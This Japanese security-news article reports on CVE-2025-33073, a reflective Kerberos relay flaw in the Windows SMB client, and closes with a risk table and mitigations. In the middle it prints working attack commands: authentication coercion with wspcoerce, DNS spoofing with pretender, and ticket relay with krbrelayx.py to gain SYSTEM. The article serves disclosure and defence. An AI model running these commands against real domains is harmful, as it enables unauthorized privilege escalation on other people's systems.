Windows SMB Client のゼロデイ脆弱性 CVE-2025-33073 が FIX:Kerberos リレー攻撃とは?

Windows SMB Client Zero-Day Vulnerability Exploited via Reflective Kerberos Relay Attack

2025/06/12 gbhackers — 新たに公開された “Reflective Kerberos Relay Attack” と呼ばれる脆弱性 CVE-2025-33073 により、Windows のセキュリティ状況が揺らいでいる。この脆弱性は、 RedTeam Pentesting により発見され、Microsoft が2025年6月10日の Patch Tuesday で修正プログラムを公開したものだ。この脆弱性により、SMB 署名を強制しないドメイン参加 Windows システムにおいて、低権限の Active Directory ユーザーが、NT AUTHORITY\SYSTEM へと権限を昇格できることが判明した。

この攻撃では、いくつかの高度な手法が活用されている:

  • 認証の強制:wspcoerceNetExec などのツールを用いる攻撃者は、Windows ホスト (例:client1) に対して、攻撃者が制御する悪意の SMB サーバへの認証を強制する。それは、RPC API を介して実行され、ターゲットにアウトバウンド SMB 接続を強制的に開始させるものだ。
  • Service Principal Name (SPN) コンヒュージョン:攻撃者は、特別に細工したホスト名 (例:client11UWhRCA…YBAAAA) の Active Directory DNS への登録、もしくは、pretender などのツールによるローカルでの名前解決の偽装を実行する。それにより、発行された Kerberos チケットが、攻撃者のシステムではなく、被害者のホストを対象にすることが保証される。
  • Kerberos チケット・リレー:攻撃者は Kerberos サービス・チケットを取得し、パッチ適用版の krbrelayx.py を用いてオリジナルのホストへとリレーする。その際には、SPN cifs/client1 のコンピューター・アカウント (例:client1$) として認証する。
  • 権限昇格:驚くべきことに、このリレーされた認証により、低権限のセッションではなく、SYSTEM レベルのアクセスが許可されるため、攻撃者は whoami などの任意のコマンドを実行し、そのレスポンスとして “ntauthority\system” を受け取ることが可能になる。

攻撃コマンドの例:

bash# Coerce authentication
$ wspcoerce 'lab.redteam/user1:Password@client1.lab.redteam' \
    file:////client11UWhRCAAAA...YBAAAA/path

# Spoof DNS to redirect authentication
$ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \
    --spoof '*1UWhRCAAAA...YBAAAA*'

# Relay Kerberos ticket and execute command
$ krbrelayx.py --target smb://client1.lab.redteam -c whoami

結果:標的マシン上で SYSTEM 権限が取得される。

技術分析と悪用の詳細

この脆弱性は、Kerberos における保護機能の脆弱性を悪用するものだ。

NTLMリレー攻撃は、2008年に MS08-068 により軽減されたが、Kerberos には、同様の保護機能が実装されていなかった。

この攻撃は、Windows のループバック認証と SPN 解決の処理を悪用し、システムを混乱させ、本来であれば付与されるべきでない権限を、付与してしまうものである。

主要な技術的要素は、以下のとおりである:

  • CredUnmarshalTargetInfo/CREDENTIAL_TARGET_INFORMATIONW トリック:James Forshaw が開発した、この手法により、攻撃者は SPN から強制型変換対象を切り離すことが可能となる。その結果として、攻撃者のホス​​トに接続している場合であっても、被害者に対して Kerberos チケットが発行されてしまう。
  • NTLM 優先順位付けのバイパス:攻撃者は、krbrelayx を改変して NTLM を無効化し、Kerberos 認証を強制できる。
  • トークン再利用の脆弱性:Windows は、コンピューター・アカウントの認証時に SYSTEM トークンを誤って再利用し、権限昇格を引き起こす。
リスク評価と軽減策

きわめて重大なリスクが生じている。SMB 署名が強制されていない、パッチ未適用のドメイン参加済み Windows ホストでは、ドメイン・ユーザーに対して、SYSTEM権限の取得を許す可能性がある。

この攻撃は、2025年2月24日までの、すべてのサポート対象 Windows 10/11 および Server バージョンに影響を及ぼす。ただし、SMB 署名がデフォルトで強制される、ドメイン・コントローラーだけは除外される。

リスク要因表
FactorRisk LevelNotes
Privilege EscalationCriticalSYSTEM-level access, full remote code execution possible
Affected SystemsHighAll domain-joined Windows 10, 11, Server 2019–2025 (excluding DCs with SMB signing)
Exploitation ComplexityModerateRequires domain access and ability to coerce authentication
Default MitigationsLowSMB signing not enforced by default on most clients and servers
Patch AvailabilityHighPatch released June 10, 2025 (apply immediately)
Attack PrerequisitesModerateAttacker must be a domain user and able to register or spoof DNS hostnames

緩和策:

  • Microsoft の 2025年6月 Patch Tuesday のセキュリティ更新プログラムを速やかに適用する。
  • ドメイン・コントローラーだけでなく、すべての Windows ホストで SMB 署名を強制する。
  • 異常な SMB 接続と強制認証の試みを監視する。
  • Active Directory DNS で不審なホスト名を確認する。

この反射型 Kerberos リレー攻撃が浮き彫りにするのは、レガシー・プロトコルが段階的に廃止される流れの中でも、多層的なセキュリティと警戒体制の継続的な必要性である。

ユーザー組織は、この重大な脅威に対して、迅速にパッチを適用し、環境を強化する必要がある。